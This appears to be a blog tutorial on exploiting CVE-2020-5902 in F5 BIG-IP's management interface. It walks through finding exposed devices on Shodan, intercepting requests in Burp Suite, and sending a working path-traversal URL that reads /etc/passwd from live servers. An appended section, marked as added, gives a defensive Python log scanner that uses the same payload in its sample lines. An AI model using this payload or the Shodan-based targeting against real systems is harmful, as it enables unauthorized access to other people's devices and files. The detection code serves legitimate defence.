Exploiting F5 Big IP Vulnerability | CVE-2020-5902

CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.

So today we are going to demonstrate how it is being used.

To exploit CVE-2020-5902, an attacker needs to send a specially crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

So first we need to find a vulnerable device. Let’s go to Shodan.

In the search box top left type:

title:"BIG-IP®"

This will give us a list of vulnerable devices.

Now let’s navigate to one of the servers.

Perfect.

Open Burp Suite. This will intercept our traffic before it hits the server so that we can modify the request.

In Burp Suite, turn on Intercept and refresh the page.

Okay we have the domain name, so before we send it to the server we are going to modify the URL and add some text.

https://{host}/tmui/login.jsp/..:/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

So let’s move to the Repeater tab to send the request.

As you can see, it prints out the /etc/passwd file. You can read other files too, like /etc/hosts. Have fun but don’t do anything illegal. You will probably get a call from the... (insert law enforcement)
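
On the defending side, a request shaped like the one above stands out in the web access log of the management interface. The following is an added example, not part of the original post: a Python check that flags TMUI requests where login.jsp is followed by a dot-dot path segment. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request part of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# login.jsp followed by a ".." segment, optionally carrying one extra
# character (as in the "..:/" of the URL shown above) before the next slash.
TRAVERSAL_RE = re.compile(r'/tmui/login\.jsp/\.\.[^/]?/', re.IGNORECASE)

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so single or double encoding is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_tmui_traversal(log_lines):
    """Return one dict per request whose decoded target matches the shape."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        target = decode_fully(m.group("target"))
        if TRAVERSAL_RE.search(target):
            hits.append({"ip": m.group("ip"),
                         "status": int(m.group("status")),
                         # 200 means the server answered the request: triage first
                         "served": m.group("status") == "200",
                         "target": target})
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Aug/2020:10:00:05 +0000] "GET /tmui/login.jsp/..:/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [07/Aug/2020:10:00:09 +0000] "GET /tmui/login.jsp/%2e%2e%3a/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 404 0',
    '203.0.113.4 - - [07/Aug/2020:10:01:00 +0000] "GET /tmui/tmui/system/user/list.jsp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_tmui_traversal(SAMPLE_LOG):
        print(hit)
```

Hits with a 200 status deserve the first look, since they indicate the request was answered rather than rejected.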

QuBits 2020-08-07

Linux Foundation Certified Engineer (LFCE)